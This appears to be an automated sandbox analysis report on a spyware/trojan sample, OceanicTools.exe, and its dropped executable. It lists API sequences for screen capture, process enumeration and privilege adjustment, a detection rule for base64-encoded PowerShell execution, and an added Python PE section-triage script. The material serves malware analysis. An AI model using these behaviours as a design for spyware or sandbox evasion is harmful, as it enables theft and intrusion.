Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2677279611.000001FB13FF5000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13AA1000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672643678.000001FB12CCF000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2672224888.000001FB12E4F000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2671528726.000001FB13A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007D6E0 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 14_2_000000014007D6E0

System Summary

Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6696, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D46A4 CreateToolhelp32Snapshot,Process32First,Process32Next,NtClose, 11_2_00007FF6350D46A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3060 GetCurrentProcess,NtQueryInformationProcess,GetTempPathA,strlen,strlen,memcpy, 11_2_00007FF6350D3060
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082030 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize, 14_2_0000000140082030
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06C0 NtQueryObject, 14_2_00000001400D06C0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06D8 NtQuerySystemInformation, 14_2_00000001400D06D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D06E8 NtAllocateVirtualMemory, 14_2_00000001400D06E8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400818F0 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,NtDuplicateObject,GetCurrentProcess,NtDuplicateObject,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle, 14_2_00000001400818F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848FE42BF 5_2_00007FF848FE42BF
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 11_2_00007FF6350D3C70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D34D0 11_2_00007FF6350D34D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D6A40 11_2_00007FF6350D6A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D7290 11_2_00007FF6350D7290
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EDA84 11_2_00007FF6350EDA84
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350E5B20 11_2_00007FF6350E5B20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350F5140 11_2_00007FF6350F5140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6351CC950 11_2_00007FF6351CC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6351B7220 11_2_00007FF6351B7220
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EC4A0 11_2_00007FF6350EC4A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350F64F0 11_2_00007FF6350F64F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350ED367 11_2_00007FF6350ED367
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008A06A 14_2_000000014008A06A
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014005F140 14_2_000000014005F140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400421C0 14_2_00000001400421C0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007F210 14_2_000000014007F210
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008426B 14_2_000000014008426B
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400743A0 14_2_00000001400743A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007E3D0 14_2_000000014007E3D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002F650 14_2_000000014002F650
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140086680 14_2_0000000140086680
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007D6E0 14_2_000000014007D6E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003B740 14_2_000000014003B740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003C7E0 14_2_000000014003C7E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140094B74 14_2_0000000140094B74
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140076BA0 14_2_0000000140076BA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007FBA0 14_2_000000014007FBA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003ABE0 14_2_000000014003ABE0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009ACF0 14_2_000000014009ACF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140084CF0 14_2_0000000140084CF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007CDF0 14_2_000000014007CDF0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003CE80 14_2_000000014003CE80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002EF60 14_2_000000014002EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009DFA0 14_2_000000014009DFA0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006E000 14_2_000000014006E000
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004E000 14_2_000000014004E000
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082030 14_2_0000000140082030
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A7038 14_2_00000001400A7038
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140036050 14_2_0000000140036050
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006B0A0 14_2_000000014006B0A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092094 14_2_0000000140092094
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007E0B0 14_2_000000014007E0B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400300C6 14_2_00000001400300C6
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A100 14_2_000000014006A100
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014003A110 14_2_000000014003A110
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006180 14_2_0000000140006180
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140028200 14_2_0000000140028200
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009E21C 14_2_000000014009E21C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140055250 14_2_0000000140055250
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009227C 14_2_000000014009227C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B92E0 14_2_00000001400B92E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400532E0 14_2_00000001400532E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A22D8 14_2_00000001400A22D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140096300 14_2_0000000140096300
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140056340 14_2_0000000140056340
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140026340 14_2_0000000140026340
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140093344 14_2_0000000140093344
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140025350 14_2_0000000140025350
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140082380 14_2_0000000140082380
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008E38C 14_2_000000014008E38C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A400 14_2_000000014006A400
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A5464 14_2_00000001400A5464
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092464 14_2_0000000140092464
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009C498 14_2_000000014009C498
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006E49A 14_2_000000014006E49A
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004C500 14_2_000000014004C500
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140062510 14_2_0000000140062510
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400705A0 14_2_00000001400705A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006610 14_2_0000000140006610
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400596B0 14_2_00000001400596B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006A730 14_2_000000014006A730
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140066750 14_2_0000000140066750
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400907A0 14_2_00000001400907A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A37AC 14_2_00000001400A37AC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009E7A4 14_2_000000014009E7A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008E884 14_2_000000014008E884
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009B968 14_2_000000014009B968
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400269E0 14_2_00000001400269E0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140078A40 14_2_0000000140078A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006AA50 14_2_000000014006AA50
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140092AAC 14_2_0000000140092AAC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140037AAD 14_2_0000000140037AAD
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A6ACC 14_2_00000001400A6ACC
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A1B68 14_2_00000001400A1B68
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400BBB80 14_2_00000001400BBB80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006DBC0 14_2_000000014006DBC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014002FC80 14_2_000000014002FC80
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140006D20 14_2_0000000140006D20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014004AD30 14_2_000000014004AD30
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140066D53 14_2_0000000140066D53
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006AD70 14_2_000000014006AD70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140005DB0 14_2_0000000140005DB0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009BE18 14_2_000000014009BE18
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014006CE40 14_2_000000014006CE40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140075E70 14_2_0000000140075E70
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140072EC0 14_2_0000000140072EC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014009CF18 14_2_000000014009CF18
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140038FB0 14_2_0000000140038FB0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D7290 14_2_00007FF6350D7290
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350F5140 14_2_00007FF6350F5140
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6351B7220 14_2_00007FF6351B7220
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EC4A0 14_2_00007FF6350EC4A0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D34D0 14_2_00007FF6350D34D0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350F64F0 14_2_00007FF6350F64F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350ED367 14_2_00007FF6350ED367
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D6A40 14_2_00007FF6350D6A40
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EDA84 14_2_00007FF6350EDA84
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350E5B20 14_2_00007FF6350E5B20
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6351CC950 14_2_00007FF6351CC950
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D3C70 14_2_00007FF6350D3C70
Source: Joe Sandbox View Dropped File: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll 3FB6B027285DB00651F0257DF8F5CA9DB5665A24A5E23F476CD3E71244BFBC7F
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00007FF6351D2CD0 appears 32 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 0000000140034B20 appears 41 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00007FF6351DC0A0 appears 40 times
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: String function: 00000001400300A0 appears 67 times
Source: qflwedtkihuzyxlg.exe_a.dll.11.dr Static PE information: Number of sections : 11 > 10
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum"
Source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6696, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: OceanicTools.exe Binary string: \\.\\\?\\Device\UNC\\\%ls%ls%lsccs=UNICODEccs=UTF-8ccs=UTF-16LE
Source: OceanicTools.exe Binary string: X@tdiv_qr.cqxn == 0n2p[qn] >= cy2rn == dnData.Hashable.LowLevelhashable-1.4.4.0-1jOpKawyX4k1n9a6vQlXXi'OsCharOsChar'OsStringOsString'PosixCharPosixChar'WindowsCharWindowsChar'PosixString'WindowsStringPosixStringSystem.OsString.Internal.Typesos-string-2.0.6-IlBa2UQjH7mL18YjMu1jzEWindowsString\\.\\\?\\Device\UNC\\\%ls%ls%lsccs=UNICODEccs=UTF-8ccs=UTF-16LE@
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@21/12@1/3
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400835B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 14_2_00000001400835B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D46A4 CreateToolhelp32Snapshot,Process32First,Process32Next,NtClose, 11_2_00007FF6350D46A4
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D0730 CoCreateInstance, 14_2_00000001400D0730
Source: C:\Users\user\Desktop\OceanicTools.exe File created: C:\Users\user\foekseyrkkzyooxy
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Mutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E69639EDEC077
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ok5tzepb.rs5.ps1
Source: OceanicTools.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
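The two static observations above (the dropped a.dll carrying eleven sections against the report's threshold of ten, and the .text section of OceanicTools.exe carrying IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_READ) are read directly from the COFF file header and the section table. The Python below is an added example, not Joe Sandbox code and not taken from the sample: it parses those fields out of a PE image and reports the section count, every section that is both writable and executable, and the flags on .text. The image it analyses is a constructed, headers-only PE32+ stub with eleven sections, one of them a hypothetical packer section named .stub marked write+execute; it is not the dropped file.

```python
"""Static PE section triage.  Added example, not Joe Sandbox code."""
import struct
from typing import Dict, List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = [("IMAGE_SCN_CNT_CODE", IMAGE_SCN_CNT_CODE),
              ("IMAGE_SCN_CNT_INITIALIZED_DATA", IMAGE_SCN_CNT_INITIALIZED_DATA),
              ("IMAGE_SCN_CNT_UNINITIALIZED_DATA", IMAGE_SCN_CNT_UNINITIALIZED_DATA),
              ("IMAGE_SCN_MEM_EXECUTE", IMAGE_SCN_MEM_EXECUTE),
              ("IMAGE_SCN_MEM_READ", IMAGE_SCN_MEM_READ),
              ("IMAGE_SCN_MEM_WRITE", IMAGE_SCN_MEM_WRITE)]
SECTION_COUNT_THRESHOLD = 10   # the report flags "11 > 10"


def parse_sections(data: bytes) -> List[Tuple[str, int]]:
    """Return (name, Characteristics) for each entry in the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsec):
        off = table + 40 * i              # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]   # Characteristics field
        sections.append((name, chars))
    return sections


def flag_names(chars: int) -> List[str]:
    return [n for n, f in FLAG_NAMES if chars & f]


def triage_pe(data: bytes) -> Dict[str, object]:
    """Section-count heuristic, W+X sections, and the flags on .text."""
    sections = parse_sections(data)
    text = next((c for n, c in sections if n == ".text"), 0)
    return {
        "section_count": len(sections),
        "many_sections": len(sections) > SECTION_COUNT_THRESHOLD,
        "wx_sections": [n for n, c in sections
                        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE],
        "text_flags": flag_names(text),
    }


def build_pe(sections: List[Tuple[str, int]]) -> bytes:
    """Constructed headers-only PE32+ image for testing; not a loadable binary."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew -> right after DOS header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                  # PE32+ magic
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Constructed layout: eleven sections, matching the dropped DLL's count, plus a
# hypothetical packer stub that is both writable and executable.
RX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE
R, RW = IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
SAMPLE_SECTIONS = [
    (".text", IMAGE_SCN_CNT_CODE | RX),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
    (".pdata", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".xdata", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".idata", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".edata", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".reloc", IMAGE_SCN_CNT_INITIALIZED_DATA | R),
    (".tls", IMAGE_SCN_CNT_INITIALIZED_DATA | RW),
    (".stub", IMAGE_SCN_CNT_INITIALIZED_DATA | RW | IMAGE_SCN_MEM_EXECUTE),
]

if __name__ == "__main__":
    print(triage_pe(build_pe(SAMPLE_SECTIONS)))
```

The section-count threshold is only a heuristic (large legitimate binaries exceed ten sections too), but a writable and executable section is worth a look on its own, since packers and self-modifying stubs need exactly that combination.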
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\OceanicTools.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: OceanicTools.exe String found in binary or memory: --install-signal-handlers=<yes|no>
Source: OceanicTools.exe String found in binary or memory: --install-seh-handlers=<yes|no>
Source: OceanicTools.exe String found in binary or memory: to be installed. Implies --install-signal-handlers=yes.
Source: OceanicTools.exe String found in binary or memory: in-addr
Source: unknown Process created: C:\Users\user\Desktop\OceanicTools.exe "C:\Users\user\Desktop\OceanicTools.exe"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
